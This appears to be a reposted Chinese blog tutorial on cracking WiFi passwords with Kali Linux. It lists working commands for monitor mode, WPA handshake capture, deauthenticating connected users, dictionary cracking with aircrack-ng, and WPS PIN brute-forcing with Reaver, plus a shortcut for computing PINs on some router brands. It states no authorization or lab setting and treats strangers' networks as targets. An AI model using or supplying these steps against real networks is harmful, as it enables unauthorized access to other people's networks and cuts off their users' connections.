Kali Linux WiFi密码破解

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Kali Linux WiFi密码破解相关的知识,希望对你有一定的参考价值。

0x01 准备工具

1.Kali Linux 2.0

2.无线网卡(兼容Kali或已安装驱动)

3.字典 - http://www.qqtn.com/down/80787.html#szdz

0x02 方法一:Aircrack字典暴力破解

1.进入终端输入: airmon-ng  查看网卡信息

2.在终端内输入:airmon-ng start wlan0(网卡名称)  开启网卡混杂模式

然后输入iwconfig,查看网卡名称是否变为wlan0mon(这里我的网卡是wlan0,所以是wlan0mon,判别方法就是网卡名称+mon)

3.输入: airodump-ng wlan0mon(网卡名称+mon)    开始扫描WiFi信号,

4.新开一个终端,输入:airodump-ng -w test(握手包保存名称) -c CH --bssid BSSID wlan0mon --ignore-negative-one  

PS:这里加粗字体都是我们需要更改的参数值,握手包名称可以任意,CH(信道)和BSSID(MAC地址)在第三步骤中就可以看到,wlan0mon还是网卡名称+mon(开启混杂模式后都会变成这样)

然后执行,会进入一个不断刷新的界面(这里就会显示这个路由器下的用户),STATION是路由器的MAC地址,这里界面出现的BSSID则是指局域网下用户的MAC地址,与第三步骤中出现局域网MAC地址的BSSID不同

5.新开一个终端,输入:aireplay-ng --deaut 20 -a 抓包用户MAC地址 -c 路由器(WiFi)MAC地址 wlan0mon --ignore-negative-one

这里我们要注意的是--deaut参数后面的数字(这里写的是20)指的是抓包次数,抓包时会暂时导致被抓包用户网络中断,所以这里我们设置了抓包次数,以防忘记停止抓包导致该用户网络一直中断(这就成恶作剧了),然后-a参数后面的抓包用户MAC地址则是第四步骤中提到的BSSID(局域网下用户的MAC地址),而-c参数后面的路由器MAC地址则是第三步骤我们获得的WiFiMAC地址,wlan0mon是原网卡名称+mon

6.抓包完成后,我们可以在终端输入ls查看生成的握手包

因为之前我输入过-w test的命令,所以我生成的握手包名为test-*.cap,然后我们将准备好的字典拖入同目录下

在终端中执行:aircrack-ng -w 字典名称 test-*.cap(握手包名称)

然后等待破解完成,如果成功破解出来WiFi密码,界面中会有出现KEY FOUND!的字样,如果破解失败则相反.

小结:这种方法和字典考不靠谱,人品好不好有极大的必然因素,换句话说,如果你没有个强大的字典,估计在现在的安全局势下,很难破解出一个WiFi,因为现在的用户大多数设置WiFi密码都是字母+数字这类组合,例如姓氏+手机号,姓名+生日这类密码,破解难度大大提高,当然也不排除有一些弱口令WiFi的存在.

 

0x03 方法二:Reaver破解PIN码

1.在终端中输入:wash -i wlan0mon(开启混杂模式的无线网卡名称)    扫描开放WPS的WiFi,如果没有开启网卡混杂模式参考方法一步骤二

2.新开一个终端输入:reaver -i wlan0mon -b 目标WiFi的MAC -a -S -vv  -c CH(信道)   然后等待破解完毕就行了

有些路由pin码可以通过计算得到:腾达和磊科的产品如果路由MAC地址是以“C8:3A:35”或“00:B0:0C”打头那么可以直接计算出PIN值。

 

以上是关于Kali Linux WiFi密码破解的主要内容,如果未能解决你的问题,请参考以下文章

如何在Kali Linux中进行WIFI钓鱼

Kali暴力破解Wifi密码完整步骤(学习记录)

Kali Linux使用Aircrack破解wifi密码(wpa/wpa2)

linux下无密码的时候可以连上wifi,设置上密码后,密码输入正确,也连不上

kali linux wifi破解(aircrack)

使用kali Hydra暴力破解phpadmin网站(失败)